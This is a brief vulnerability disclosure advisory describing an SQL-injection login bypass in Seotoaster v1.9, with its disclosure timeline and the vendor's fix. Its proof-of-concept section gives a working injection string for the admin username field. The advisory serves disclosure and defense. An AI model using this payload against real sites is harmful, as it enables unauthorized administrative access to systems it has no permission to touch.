SecurityvulnsSECURITYVULNS:DOC:27451Seotoaster SQL-Injection Admin Login Bypass
Advisory: Seotoaster SQL-Injection Admin Login Bypass
Advisory ID: INFOSERVE-ADV2011-06
Author: Stefan Schurtz
Contact: [email protected]
Affected Software: Successfully tested on Seotoaster v.1.9
Vendor URL: http://www.seotoaster.com/
Vendor Status: fixed
==========================
Vulnerability Description
Seotoaster v.1.9 is prone to an SQL-Injection which bypass the admin login
==================
PoC-Exploit
http://<target>/seotoaster/go
User: ' or 1=1)#
PW: notimportant
=========
Solution
Upgrade to the latest version
====================
Disclosure Timeline
15-Nov-2011 - Secunia SVCRP ([email protected])
15-Dec-2011 - fixed by vendor
========
Credits
Vulnerabilitiy found and advisory written by the INFOSERVE security team.
===========
References
http://secunia.com/advisories/46881/
http://www.infoserve.de/system/files/advisories/INFOSERVE-ADV2011-06.txt